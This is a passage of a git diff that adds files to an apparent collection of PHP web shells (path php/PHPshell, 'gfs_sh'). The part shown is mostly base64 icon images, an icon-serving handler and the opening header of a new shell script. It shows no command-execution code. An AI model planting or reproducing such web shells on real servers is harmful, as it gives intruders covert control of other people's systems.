+"IjfXKLHryRK4oaRDJByQwlQP1SQkUypAgdpsDYErruRAOpaPm7Q6HQEAOw==", +"ext_pcx"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_php"=> +"R0lGODlhEAAQAJECADZOogAAAAAAAAAAACH5BAEAAAIALAAAAAAQABAAAAIolI+pywIPG1CzWReD". +"0bB6oYGO4WXBiT0kEnJJtcXwJc2kvb51R/d0AQA7", +"ext_pif"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAEO/DISasEOGuNDkJMeDDjGH7HpmYd9jwazKUybG+tvOlA7gK1mYv3w7RW". +"mJRRiRQ2Z5+odNqxWK/YrDUCADs=", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_png"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_reg"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgACAgMDAwAD//wAAAAAAAANM". +"aCrcrtCIQCslIkprScjQxFFACYQO053SMASFC6xSEQCvvAr2gMuzCgEwiZlwwQtRlkPuej2nkAh7". +"GZPK43E0DI1oC4J4TO4qtOhSAgA7", +"ext_rev"=> +"R0lGODlhEAAQAFUAACH5BAEAAD8ALAAAAAAQABAAhQAAAOvz+////1gdAFAAANDY4IYCU/9aZJIC". +"Wtvi7PmyheLq8xE2AAAyUNTc5DIyMr7H09jf5/L5/+Dg8PX6/4SHl/D4/5OXpKGmse/2/ZicqPb6". +"/28aIBlOAMHI0MzU3MXFHjJQAOfu9d7k7gA4Xv//sRVDAI0GUY0CU+Hn8ABbjfFwOABMfwhfL/99". +"0v+H1+hatf9syvRjwP+V3gA4boCAAABQhf+j5f++8P950FBQAN/n8PD2/HNzAABilgAAAAaRwIFw". +"SCz+MJpLhdMzOJ9PAqRQmJxKuNvs5crFZDBCwSIQcECItDqNIlAkGcejRqjb74C8fs8/JiskLD4e". +"BRERCSMpIg1TVTYqAZGRPBsCCw1jZTSVZZ0CAZdvcQ+SBwqfn5d8pacBqX5KJgEHtAcrrTsMjRM6". +"rKgLBQyZAiG+rh8tDKJyCc3OEQUdHQx81Xs/QQA7", +"ext_rmi"=> +"R0lGODlhFAAUAKL/AAAAAH8Af//4/8DAwL+/v39/fwAAAAAAACH5BAEAAAMALAAAAAAUABQAQANS". +"OLrcvkXIMKUg4BXCu8eaJV5C8QxRQAmqBTpFLM+nEk3qemUwXkmvxs3n4tWOyCRk5DKdhi0JYGpk". +"QFm6oNWyylaXud8uxI2Oe8zig8puf5WNBAA7", +"ext_rtf"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_shtm"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc". +"ETbgR3aZmrIlVgAAOw==", +"ext_shtml"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc". +"ETbgR3aZmrIlVgAAOw==", +"ext_so"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_stl"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd". +"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_sys"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". +"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_theme"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA". +"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_url"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7". +"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk". +"fRQRADs=", +"ext_vbe"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH". +"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16". +"seAwLAEAOw==", +"ext_vbs"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ". +"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY". +"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==", +"ext_vcf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//". +"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4". +"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7", +"ext_wav"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wma"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wmf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7", +"ext_xsl"=> +"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA". +"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh". +"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD". +"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw==", +"1"=> +"R0lGODlhGAASAPZKAAICAgISCgI6EgJqFj6aIkyiJhqWIg6WIgJ6GkKeIk6mJgJSFgJOFAIyEgJe". +"FjaKHkKSHkKOHgI+EiJyGjqCGjaCGj6KImKqQmauSgJGEipyFip2Gi52GgJWFgIqDjZ+HiJ+LgJW". +"GgJKEhBQGSZuHiJuFiJqFgImDlrOQiJuGiZ2HAJaFyaCHDKSHi5+GhJmFh5iFxpiFl6iQhp6Li6O". +"HkLCKjqqJjKCGhZuFhpaFhZaFgJeGjaqJj6yJjJ+Gi56GgJSEgJmGhZOFiJaGiZmIi52KkKKNlKe". +"PmKySnLGUnrWWip6GjaaIjKOHgJyGgIWCgoeCgIuDgJiFh5yFhJaFg5qFgp2GgqCHgJmHgJuGiZy". +"FiJmFiKCHiaOHg5OElqaQiqGLgJ2GipyGiZqGiJmGip+HiqOIi6WJhImFgJ+HhiCGiJ6GiJqGh5m". +"GiJ2GiaKHgImCkKONh52GhZyFhZ2GhZ+GhaGHlaWQmKmRl6iRgIiCwIeCgIaCgI2EgAAAAAAACwA". +"AAAAGAASAAAH/4AAAQIDBAUGAYiKiYwHjQGDCAkKBQsBlpiXmpkMAQ0ODxAREKSlpqemEhMUFa2u". +"rhYXGLO0tRkaGxwdHhm5uR8YICELGcUZIiIMDCMkJSYnKB4lJSkqGB0iKywtLi/FycswMTELJxkw". +"6DIzDCs0NTY3GzgZDAsdIzk5Ojr5/Rg7DFTw6OHjBwcNIoA4CDJCyBAiRYwcQZJECYYVC5YwafLD". +"4AaFA5yMeALlRBQJIjpIGfBvxZQbBTds0EClipUrIwJE0RnAA6QAGLBIyaKFg68tMCZw6ZLTSwAR". +"ATL8/AImS5gJYjaIGUOGRBkzZ3L+HBsADYY0atakYNOGDBs3LEfemMm5c6dPOJDMxuEiB4ffOXTq". +"qLHT9GnUwxLK3sGAJ4/jPHhoiSVLufJPujzvBsCLV08Az3sC8BEdoDBUqVITJ+7jqbXmQAA7", +"2"=> +"R0lGODlhPwASAOUDAFmwLFGkJUKQHmauSgBNEgBOEgBYFgBXFgBlGQBkGQByGgBxGgBzGgqAHQCB". +"HQ2BHQqCHRCCHSWNHySOHyWPICePICuXJSyWJSmXJSmPICeQISaPIBaFHQAQCgAZCgAXCgAWCgAU". +"CgASCgAlCgAhCgAfCgAbCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAPwASAAAG40CAcEgsGo/IpBIZ". +"aDqf0Kh0Sq1OBdisdsvter9g72BMLpvP6LR6nS643/C4fE6v2+/4vH4vNxz+B35/BoSCgYWAh4SJ". +"iIqLgYyJkokIlZaXmJmam5ydmwqgoaKjpKWmp6imEA4QrayrrbGys6+ztreuuLMPEBESv8DBwsPE". +"xcbHwxobFhfNF8zPztHT09DN0NbZ0tbU0s7QGeHhGuLi5OXo6eYa5+ru7xkbHPP09fb3+Pn6+/ls". +"/v8A/4kYSLCgwYMIEypcmNCDCBAPIzKcSLGiwREiSIgoIcKhQ4gQLYocKSIIADs=", +"3"=> +"R0lGODlhBgASAOUDAFmwLFGkJUKQHmauSmGoQz2IIDeCGwBUFwBZGiB/LjR+Hyt2GQBOEgBPFABV". +"Fyl0HgBXFgBYFwBbFwBjGTCEMFmiQQBmFwBpFwBtGQBzGhKCIGWtSgB2GwB6HQB/HQCCHRuIHwCE". +"HRCGHRKJHRKLHR2PICWPICSPIC2XJCyWJSmXJCmWJCmaJUOMO1iYQimPICyPIhImFB+IHySOIUGK". +"OAAQCliXQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAABgASAAAGSkCAcBgoGgXI5GBA". +"KBgMEERioFgwGA3I4AGRSCaUiuWCyWgGnI7nAxqERKNRaTAz2VGDFEvfcsH+MAMxMjM0gjVLNjE1". +"jI2Oj49BADs=", +"4"=> +"R0lGODlhQgASANQJAFmwLFGkJUKQHjeCGyt2GSFsFx1gFhtZFIrdY4zdZIndYobdYoPdYILdX4Dd". +"X3/dXgBvGQBuGQBwGQAQCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAA". +"QgASAAAFlSAgjmRpnmiqrkHrvnAsz3RtC3iu73zv/8DgYEgsGo/IpHLJJDif0Kh0Sq1ar4Wsdsvt". +"er/gsNhALpvP6LR6zW4f3vC4fE6v2+94hB6R6Pv/fnoJeguFhgiFDIqKDY2OjQ+GC3uCgJYRmJma". +"m5ydnpgSn6KeE6Wmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsMhADs=", +"5"=> +"R0lGODlhIQASAPYtAFmwLBqWIAASCg2VIEugJD6YIABqFwA6EAAAAFGkJQBSFABOFE2iJE6lJUKd". +"IgB5G0KQHkGPHTaJHQBdFgAzEDeCGzuBGiBxGQA+ECt2GQAtDQBFEi53GSpwFyFsFwAnDVrNQgAq". +"DSFqFyVsFxBQGR5hFhtgFhtZFBdZFIDdX3/dXobdYondYozdZInaYofYYYPTXn3MW3jEV3G6UWix". +"TF+lRVWYP0qLODx7LjNvKShhIRlYHRJQFxRKFA1GEgBuGQBlFwBaFABUFAAzDQ0dCgoZCgoWCgAW". +"CgAaCgAeCgAiCgAlCgA3EABKEg1OEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA". +"AAAAIQASAAAH/4AAgoOCAQKGiIeKA4sCAAQFBgcCCAmWl5YKApqcm56dCwIJDA0OD5MQqaqrrK2u". +"ERASExQVtba3uLm6tRYXGBnAwcLDxMMKGhscGR0bHs7P0NHS0R8gISIeIyQl3N3e3+DfCh8bJtwk". +"J+nq6+zt7ijwJiQpKSor9yss+votLSwuL2DEkDGDRg0bN3Dk0LGDRw8fJH5InEixokQDQCYEEbJg". +"A4YhGj4QKWJEAAkBAo6kXIlEQMuWSQQokSlgSc2bIQRo0GnypYCYM23azElBQFEmAjAkFbCBqYAm". +"ApyYREm1qtWrWK2eXKlSpU+YNIPeHMpzJwmfQMcKIGpUAFKlSiObNoUqdWvWu3ipbu3K0qXftGKF". +"ri3b8y9NwWyPLo3rlK7JQAA7", +"font"=> +"/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAACgAA/+4ADkFkb2JlAGTAAAAAAf/b". +"AIQAFBAQGRIZJxcXJzImHyYyLiYmJiYuPjU1NTU1PkRBQUFBQUFERERERERERERERERERERERERE". +"RERERERERERERAEVGRkgHCAmGBgmNiYgJjZENisrNkREREI1QkRERERERERERERERERERERERERE". +"RERERERERERERERERERERERE/8AAEQgAlACUAwEiAAIRAQMRAf/EAHAAAAMBAQEAAAAAAAAAAAAA". +"AAACAwEEBgEBAAAAAAAAAAAAAAAAAAAAABAAAQMDAwMCBQIFBAMAAAAAAQAR4iGhAjESA0FhcVEi". +"8IGxwRPhwvFSgvIE0TJCYnKSohEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEQMRAD8A85yO+rfO". +"SMMvTp3kjIkmvyrJPjk3WnmSCZyJLuPj+pM2QZ+veSTLlr28yVMeQkit5IMz4wA4y+P/AGUiW63k". +"unPMnWnx/wCS5ssvT6yQU489oZ9e8kFvW8k/DmG/WSjvO7W8kDbiOr/OSMcq0+slu7veSwcvobyQ". +"Bc6m8kbm63kjLItreSmM263kguSRi7hvMlIE7daeZLTyk47fvJZv9rPeSB+PlFHN5JuUhwxvJQxI". +"epvJVJALfeSBcvR7yWYgkt95KmTNreSXHLIGhf5yQY3Tr5khbuL9/MkIH5eQO7v85KQzJ63ktJ9r". +"veSUZt1vJBmRY1N5JvyBh27ySnJ6veSelK3kgtnlUg0Px3UTlVwbyVTlj0L/AB5UX73kgph7tcm+". +"clI5B6GnmSfAEuX7ayUiWOt5IH30d7yWYZN1vJLuej3kqYgnreSBs83x1vJSf1N5J26veSXI97yQ". +"dGO3Z8vWSRxs1r5kjEPjreSwYvjue8kExUO95LTyHqbyW8ebGpvJNzZuQxvJAm/veSrxkvreSgcj". +"63kqcRJOtPMkGv7nfr6yQt7PeSEGZ5FyD9ZJMcvU3kqZkklzeSHp7vrJBPLIPreSCSCK3kinQ3km". +"3gsB9ZIH5c2AANR/2/UKb97yVs8AA73ko5HveSCmPLtDfeSi7nW8lTHHdiwNX9ZKbt1f5yQGXq95". +"KoY1fp6yU3y9byVMX13afH8yBeTJgz3ksGYNHvJGWXTL6yWBh1vJBYPtcZfJ5KR5CcWGnmSc8hAH". +"j1kp45tT7yQbhkOpp5kmzOIIA+slmIchzeSblYEMbyQKW9byTY57TreSzIhqGvmSkSfW8kFvyV1v". +"JCVy2tfMkIN5OYE0L/OS0ZuKG8knKQDT6yT8eQABe8kGFuv1knOeIY4mvmShnybsne8lXEilbyQY". +"f8g5UJp5kkOXe8lbkxxxLg9fWSm/e8kG8eJy6t61ksdtDeSpxAkODr3koZ51Z9O8kGnkagN5Jxyg". +"9byUX73kqOB1vJBQl8XBr5kpO3W8lhyOr3kmJ7695IN3ECj+XkgY+13vJWxzGxn6eslHcW1p5kg3". +"HIir3ksy5zkdbyWDKoreSCADQv8AOSBssgRrXzJKC9HvJYToXvJNjlV3vJAbqs9fMkJfy+7W8kIN". +"5BtLPeSMPN5Izy9TXzJbg563kgnka0N5LRmSQHvJNl7Sz3kkGTHW8kHTy4ZYiuT/ADkucEvreSuf". +"8jeGP1kkOVdbyQU4ssgA1X7yXPmfca3kuri5RjiQTV/WS5+TJ8nBp5kgmS3W8loJPW8kwyB63kmx". +"yGNXvJApyo33kjfUVvJWzO7HdoK/GqiD3vJAEFv1kgZ0b7yXTjyDYzjT1kpbwBrXzJACoYm8kcjY". +"ZMDeSOM7tTTzJbyjHEit5IJ5Gmt5JsMhiam8kZZgdbySb3qDeSBt2O93p5khJ11vJCB8uQEu95IH". +"K1B9ZIzGzrTzJKM2IL3kgw51qbyTZ9jeSCXOtPMlmWTChvJBozb+MkmRrreSbHkHU3kseut5IOr/". +"AByAKm8lLMsSQbyWYEHreSUcrn9ZIDcDqW+ck4yx9byWbu95Jg3reSDCCQ708ySu3W8lXPNsaGnm". +"S5xyepvJBfHEbO/mSk3td7yTa47hleSXHIka08yQHGcnobyW8m5wcjeSbHMBq3kt5Mjk3T5yQSyJ". +"P8ZJ8GBd7yQdNbyWYgks7jzJAbxud7yQl9rs95IQPyA0BN5KenW8lXk5NzMdKayUhm9AbyQBypre". +"Sw5uNbyWkt1vJA7m8kGP3vJG7veSYZd6eZIJrreSBRkRV7yRjlXW8lXjALv9ZJMvaTWg7yQZln0e". +"8lozINTeSXd3vJM/w8kD5Znb+slHd3vJdBOO0jQ+ZKIHqbyQaOUtte8kwy9rPeSMdur18yT45A4d". +"/MkGcf8AM/X1kn5+bEttN5KfQl6eZJMyKAGnmSDTyd7yW4cjn9ZJMqdbyTcZ73kg1qt18yQm/IHd". +"7yQgzLIavr3kkNKg3km5CMdDeSXHMk63kgN/V7yTFmBB17ySZmut5IORYVvJA+BHU3kkyzrreSMM". +"u95Jz8VkgfibIO95JMg2RreSfiJqx07yU8+Ri5NfMkAcgOt5KgzB0N5Ln3P1vJbubreSDpzwYO95". +"KDtV7yTfnLN95LH7695IKBzj/up5kkFA73knx5iAB95JTmWp9ZIDfqH17yUn73krAghnr5kt5Msc". +"urHzJBHcepvJNhk51vJaR3vJGPIMTreSAY7tr3khDl9z18yQgzIsKm8kmJcs95J+XMZMxvJLiSC7". +"3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB". +"B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn". +"5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO". +"MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U". +"hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc". +"/wDchCA97/3IQhB//9k=", +"pdisk"=> +"R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK". +"yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX". +"V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O". +"jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp". +"qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N". +"Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C". +"BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF". +"IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7", +"odel"=> +"R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq". +"SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs=" + +); +$imgequals = array( +"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), +"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"), +"ext_htaccess"=>array("ext_htaccess","ext_htpasswd") +); + ksort($arrimg); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) + { +if (in_array($img,$v)) {$img = $k;} + } + if (empty($arrimg[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($arrimg[$img]); + } + else + { + echo "<center>"; + $k = array_keys($arrimg); + foreach ($k as $u) + { +echo $u.":<img src=\"".$sul."act=img&img=".$u."\" border=\"1\"><br>"; + } + echo "</center>"; + } + exit; +} +if ($act == "about") +{ + $dàta = "Any stupid copyrights and copylefts"; + echo $data; +} + +$microtime = round(getmicrotime()-$starttime,4); + +?> +<? // [CT] TEAM SCRIPTING - RODNOC ?> \ No newline at end of file diff --git a/php/PHPshell/gfs_sh/gfs_sh.jpg b/php/PHPshell/gfs_sh/gfs_sh.jpg new file mode 100644 index 0000000..a8a32f2 Binary files /dev/null and b/php/PHPshell/gfs_sh/gfs_sh.jpg differ diff --git a/php/PHPshell/gfs_sh/gfs_sh.php b/php/PHPshell/gfs_sh/gfs_sh.php new file mode 100644 index 0000000..dd6c601 --- /dev/null +++ b/php/PHPshell/gfs_sh/gfs_sh.php @@ -0,0 +1,1575 @@ +<? +/* +************************* +* ###### ##### ###### * +* ###### ##### ###### * +* ## ## ## * 